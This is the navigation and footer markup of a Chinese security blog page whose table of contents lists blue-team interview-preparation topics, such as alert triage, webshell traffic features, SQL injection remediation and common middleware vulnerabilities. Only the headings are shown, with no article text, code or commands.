        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#HW-prepare"><span class="nav-text">HW prepare</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AF%B9hw%E7%9A%84%E7%90%86%E8%A7%A3"><span class="nav-text">对hw的理解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hw%E9%98%B2%E5%AE%88%E4%BA%BA%E5%91%98%E7%BB%84%E6%88%90"><span class="nav-text">hw防守人员组成</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E5%85%A8%E4%BA%A7%E5%93%81%E4%BA%86%E8%A7%A3%E5%93%AA%E4%BA%9B"><span class="nav-text">安全产品了解哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-text"></span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pdf%E8%A7%A3%E6%9E%90%E6%9C%89%E6%B2%A1%E6%9C%89%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8xxe"><span class="nav-text">pdf解析有没有可能存在xxe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#http%E5%8D%8F%E8%AE%AE%E9%87%8C%E9%9D%A2method%E5%92%8Cdata"><span class="nav-text">http协议里面method和data</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%91%8A%E8%AD%A6%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD"><span class="nav-text">威胁情报告警如何判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E7%B1%BB%E7%9A%84%E5%91%8A%E8%AD%A6%E8%A6%81%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD"><span class="nav-text">网络攻击类的告警要怎么判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E7%9A%84%E4%BF%AE%E5%A4%8D%E6%96%B9%E5%BC%8F"><span class="nav-text">sql注入的修复方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E7%9A%84%E6%96%B9%E5%90%91%E6%9D%A5%E8%87%AA%E5%93%AA%E4%B8%89%E4%B8%AA%E6%96%B9%E5%90%91"><span class="nav-text">网络攻击的方向来自哪三个方向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%94%BB%E5%87%BB%E6%98%AF%E4%B8%8D%E6%98%AF%E8%AF%AF%E6%8A%A5"><span class="nav-text">如何判断攻击是不是误报</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS%E5%A4%96%E5%B8%A6%E5%AD%98%E5%9C%A8%E5%93%AA%E4%BA%9B%E6%BC%8F%E6%B4%9E"><span class="nav-text">DNS外带存在哪些漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83"><span class="nav-text">什么是攻防演练</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%ADsocket%E4%BB%A3%E7%90%86"><span class="nav-text">怎么判断socket代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="nav-text">一句话木马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A4%BE%E5%B7%A5%E6%89%8B%E6%AE%B5%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">社工手段有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fastjson"><span class="nav-text">fastjson</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%A2%E6%9C%8D%E6%9C%89%E6%98%A0%E5%B0%84%E5%88%B0%E5%A4%96%E7%BD%91%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A2%AB%E6%89%93%E8%BF%9B%E6%9D%A5%E4%BA%86%EF%BC%8C%E5%A6%82%E4%BD%95%E6%BA%AF%E6%BA%90"><span class="nav-text">客服有映射到外网的服务器被打进来了，如何溯源</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="nav-text">常见的中间件漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ngsoc%E5%86%B7%E7%83%AD%E6%95%B0%E6%8D%AE"><span class="nav-text">ngsoc冷热数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7%E7%B1%BB%E5%91%8A%E8%AD%A6%EF%BC%8C%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">代理工具类告警，流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%A0%E6%84%9F%E8%A7%89windows%E6%BC%8F%E6%B4%9E%E5%A4%9A%E8%BF%98%E6%98%AFlinux%E6%BC%8F%E6%B4%9E%E5%A4%9A"><span class="nav-text">你感觉windows漏洞多还是linux漏洞多</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D"><span class="nav-text">永恒之蓝</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%86%99%E6%96%87%E4%BB%B6"><span class="nav-text">sql注入写文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86"><span class="nav-text">正向代理反向代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BB%B6%E6%97%B6%E6%B3%A8%E5%85%A5%E5%9C%A8%E6%B5%81%E9%87%8F%E5%91%8A%E8%AD%A6%E4%B8%8A%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E7%9A%84"><span class="nav-text">延时注入在流量告警上如何判断的</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82"><span class="nav-text">宽字节</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">流量代理工具有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E%E4%B8%8E%E5%93%A5%E6%96%AF%E6%8B%89%E7%9A%84%E8%BF%9E%E6%8E%A5%E7%89%B9%E5%BE%81"><span class="nav-text">冰蝎与哥斯拉的连接特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E6%98%AF%E5%90%A6%E6%94%BB%E5%87%BB%E6%88%90%E5%8A%9F"><span class="nav-text">怎么判断逻辑漏洞是否攻击成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E4%BF%AE%E5%A4%8D%E6%96%B9%E5%BC%8F"><span class="nav-text">sql注入修复方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E4%B8%8Engsoc%E5%8C%BA%E5%88%AB"><span class="nav-text">天眼与ngsoc区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%A6%82%E4%BD%95%E9%98%B2%E5%BE%A1"><span class="nav-text">文件上传漏洞如何防御</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xff"><span class="nav-text">xff</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%86%99%E6%96%87%E4%BB%B6%E5%89%8D%E6%8F%90"><span class="nav-text">sql注入写文件前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap%E4%B8%80%E4%BA%9B%E5%8F%82%E6%95%B0"><span class="nav-text">sqlmap一些参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#csrf"><span class="nav-text">csrf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf"><span class="nav-text">ssrf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B0%B4%E5%9D%91%E6%BC%8F%E6%B4%9E"><span class="nav-text">水坑漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%B1%BC%E5%8F%89%E6%94%BB%E5%87%BB"><span class="nav-text">鱼叉攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tomcat%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E7%9A%84%E5%90%8E%E7%BC%80%E5%90%8D"><span class="nav-text">tomcat可以执行的后缀名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8D%8F%E8%AE%AE"><span class="nav-text">ssrf有哪些协议</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="nav-text">mysql数据库系统执行函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap%E5%8F%82%E6%95%B0"><span class="nav-text">nmap参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E5%8F%AF%E4%BB%A5%E6%A3%80%E6%B5%8B%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%90%97"><span class="nav-text">天眼可以检测逻辑漏洞吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7%EF%BC%8C%E4%BB%A3%E7%90%86"><span class="nav-text">内网渗透工具，代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%B5%81%E7%A8%8B"><span class="nav-text">渗透测试流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90%E8%AF%AD%E6%B3%95"><span class="nav-text">天眼日志分析语法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E5%92%8C%E5%A8%81%E8%83%81%E6%A3%80%E6%B5%8B%E5%8C%BA%E5%88%AB"><span class="nav-text">天眼流量分析和威胁检测区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E5%8F%AF%E4%BB%A5%E5%AE%A10day%E5%90%97"><span class="nav-text">天眼可以审0day吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E8%87%AA%E5%B7%B1%E7%9A%84%E6%9C%BA%E5%99%A8%E6%98%AF%E4%B8%8D%E6%98%AF%E5%9F%9F%E6%8E%A7"><span class="nav-text">怎么判断自己的机器是不是域控</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81webshell%E6%B5%81%E9%87%8F%E4%BD%93%E5%BE%81"><span class="nav-text">常见webshell流量体征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%95%B0%E6%8D%AE%E5%BA%93%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%BC%8F%E6%B4%9E"><span class="nav-text">常用数据库默认端口及漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E6%A0%87ip%E6%98%AF%E9%82%AE%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A6%81%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">目标ip是邮件服务器要怎么处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E7%9A%84ip%E6%98%AF114-114-114-114%E7%AB%AF%E5%8F%A3%E6%98%AF53%E9%9C%80%E8%A6%81%E5%B0%81%E7%A6%81%E5%90%97"><span class="nav-text">目的ip是114.114.114.114端口是53需要封禁吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BE%A4%E9%87%8C%E9%9D%A2%E9%81%87%E5%88%B0exe%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">群里面遇到exe可执行程序怎么处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%81%87%E5%88%B0%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%91%8A%E8%AD%A6%E5%A6%82%E4%BD%95%E5%A4%84%E7%90%86"><span class="nav-text">遇到远控木马告警如何处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cs"><span class="nav-text">cs</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wireshark%E8%BF%87%E6%BB%A4%E6%9D%A1%E4%BB%B6"><span class="nav-text">wireshark过滤条件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-text">shiro反序列化漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%9A%81%E5%89%91%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">蚁剑流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92%E4%BC%A0%E6%92%AD%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">勒索病毒传播方式有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#log4j%E6%BC%8F%E6%B4%9E"><span class="nav-text">log4j漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wireshark%E6%8A%93%E5%88%B0%E6%95%B0%E6%8D%AE%E5%8C%85%E4%B9%8B%E5%90%8E%E4%BD%A0%E6%80%8E%E4%B9%88%E5%8E%BB%E5%88%86%E6%9E%90"><span class="nav-text">wireshark抓到数据包之后你怎么去分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#redis-mongodb%E7%AB%AF%E5%8F%A3%E5%8F%B7"><span class="nav-text">redis mongodb端口号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E6%8E%A2%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8A%9F%E8%83%BD"><span class="nav-text">天眼探针有什么功能</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E8%83%BD%E5%90%A6%E6%A3%80%E7%B4%A2%E7%BD%91%E7%BB%9C%E6%97%A5%E5%BF%97"><span class="nav-text">天眼能否检索网络日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#struct2%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="nav-text">struct2命令执行漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E7%9B%AE%E7%9A%84%E7%AB%AF%E5%8F%A3%E4%B8%BA-x-X-x-x-%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9Fwin7%E6%88%96%E8%80%85win8%EF%BC%8C%E6%A3%80%E7%B4%A2%E8%AF%AD%E5%8F%A5%E8%A6%81%E6%80%8E%E4%B9%88%E5%86%99"><span class="nav-text">如果目的端口为: x.X.x.x,操作系统win7或者win8，检索语句要怎么写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%86%99%E6%A8%A1%E7%B3%8A%E6%9F%A5%E8%AF%A2%E5%91%8A%E8%AD%A6%E7%B1%BB%E5%9E%8B%E4%B8%BA%E5%86%99%E5%85%A5%E6%96%87%E4%BB%B6%E7%9A%84%E6%A3%80%E7%B4%A2%E8%AF%AD%E5%8F%A5"><span class="nav-text">怎么写模糊查询告警类型为写入文件的检索语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E5%87%BA%E7%8E%B0%E4%B8%A4%E6%9D%A1%E7%9B%B8%E5%90%8C%E7%9A%84sql%E6%B3%A8%E5%85%A5%E5%91%8A%E8%AD%A6%E4%BD%A0%E4%BC%9A%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">如果出现两条相同的sql注入告警你会怎么处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E5%87%BA%E7%8E%B0%E8%A0%95%E8%99%AB%E7%97%85%E6%AF%92%E5%91%8A%E8%AD%A6%EF%BC%8C%E5%A6%82%E4%BD%95%E5%A4%84%E7%90%86"><span class="nav-text">如果出现蠕虫病毒告警，如何处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="nav-text">php命令执行函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">冰蝎流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%93%A5%E6%96%AF%E6%8B%89%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">哥斯拉流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%91%E7%8E%B0%E6%9C%89%E5%85%A5%E4%BE%B5%E6%94%BB%E5%87%BB%EF%BC%8C%E6%9F%A5%E7%9C%8B%E4%B8%BB%E6%9C%BA%E7%9A%84%E5%93%AA%E4%BA%9B%E6%97%A5%E5%BF%97"><span class="nav-text">发现有入侵攻击，查看主机的哪些日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E9%98%B2%E8%8C%83%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-text">如何防范反序列化漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E4%B8%8A%E6%98%BE%E7%A4%BA%E5%A4%9A%E4%B8%AA%E4%B8%8D%E5%90%8Curl%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E5%91%8A%E8%AD%A6%EF%BC%8C%E5%8F%AF%E8%83%BD%E6%98%AF%E4%BB%80%E4%B9%88%E5%8E%9F%E5%9B%A0%EF%BC%9F"><span class="nav-text">天眼上显示多个不同url的SQL注入告警，可能是什么原因？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%91%E4%BB%AC%E5%9C%A8%E5%A4%A9%E7%9C%BC%E4%B8%8A%E9%81%87%E5%88%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%91%8A%E8%AD%A6%E6%97%B6%EF%BC%8C%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E7%9A%84%E6%B5%81%E7%A8%8B%E6%98%AF%E6%80%8E%E6%A0%B7%E7%9A%84%EF%BC%9F-%E5%90%8C%E4%B8%80%E5%8F%B0%E8%B5%84%E4%BA%A7%E5%A4%9A%E6%AC%A1%E5%8F%91%E5%87%BA%E5%90%8C%E4%B8%80%E4%B8%AA%E5%91%8A%E8%AD%A6%EF%BC%8C%E5%8F%AF%E8%83%BD%E7%9A%84%E5%8E%9F%E5%9B%A0%EF%BC%9F"><span class="nav-text">我们在天眼上遇到文件上传告警时，应急响应的流程是怎样的？ 同一台资产多次发出同一个告警，可能的原因？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#linux%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E4%BD%8D%E7%BD%AE"><span class="nav-text">linux临时文件位置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E5%A4%A9%E7%9C%BC%E9%81%87%E5%88%B0sql%E5%91%8A%E8%AD%A6%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">使用天眼遇到sql告警怎么处理</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">P1taya</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            
                <span class="count-box border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">79.9k</span>
                </span>
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#HW-prepare"><span class="nav-text">HW prepare</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AF%B9hw%E7%9A%84%E7%90%86%E8%A7%A3"><span class="nav-text">对hw的理解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hw%E9%98%B2%E5%AE%88%E4%BA%BA%E5%91%98%E7%BB%84%E6%88%90"><span class="nav-text">hw防守人员组成</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E5%85%A8%E4%BA%A7%E5%93%81%E4%BA%86%E8%A7%A3%E5%93%AA%E4%BA%9B"><span class="nav-text">安全产品了解哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-text"></span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pdf%E8%A7%A3%E6%9E%90%E6%9C%89%E6%B2%A1%E6%9C%89%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8xxe"><span class="nav-text">pdf解析有没有可能存在xxe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#http%E5%8D%8F%E8%AE%AE%E9%87%8C%E9%9D%A2method%E5%92%8Cdata"><span class="nav-text">http协议里面method和data</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%91%8A%E8%AD%A6%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD"><span class="nav-text">威胁情报告警如何判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E7%B1%BB%E7%9A%84%E5%91%8A%E8%AD%A6%E8%A6%81%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD"><span class="nav-text">网络攻击类的告警要怎么判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E7%9A%84%E4%BF%AE%E5%A4%8D%E6%96%B9%E5%BC%8F"><span class="nav-text">sql注入的修复方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E7%9A%84%E6%96%B9%E5%90%91%E6%9D%A5%E8%87%AA%E5%93%AA%E4%B8%89%E4%B8%AA%E6%96%B9%E5%90%91"><span class="nav-text">网络攻击的方向来自哪三个方向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%94%BB%E5%87%BB%E6%98%AF%E4%B8%8D%E6%98%AF%E8%AF%AF%E6%8A%A5"><span class="nav-text">如何判断攻击是不是误报</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS%E5%A4%96%E5%B8%A6%E5%AD%98%E5%9C%A8%E5%93%AA%E4%BA%9B%E6%BC%8F%E6%B4%9E"><span class="nav-text">DNS外带存在哪些漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83"><span class="nav-text">什么是攻防演练</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%ADsocket%E4%BB%A3%E7%90%86"><span class="nav-text">怎么判断socket代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="nav-text">一句话木马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A4%BE%E5%B7%A5%E6%89%8B%E6%AE%B5%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">社工手段有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fastjson"><span class="nav-text">fastjson</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%A2%E6%9C%8D%E6%9C%89%E6%98%A0%E5%B0%84%E5%88%B0%E5%A4%96%E7%BD%91%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A2%AB%E6%89%93%E8%BF%9B%E6%9D%A5%E4%BA%86%EF%BC%8C%E5%A6%82%E4%BD%95%E6%BA%AF%E6%BA%90"><span class="nav-text">客服有映射到外网的服务器被打进来了，如何溯源</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="nav-text">常见的中间件漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ngsoc%E5%86%B7%E7%83%AD%E6%95%B0%E6%8D%AE"><span class="nav-text">ngsoc冷热数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" 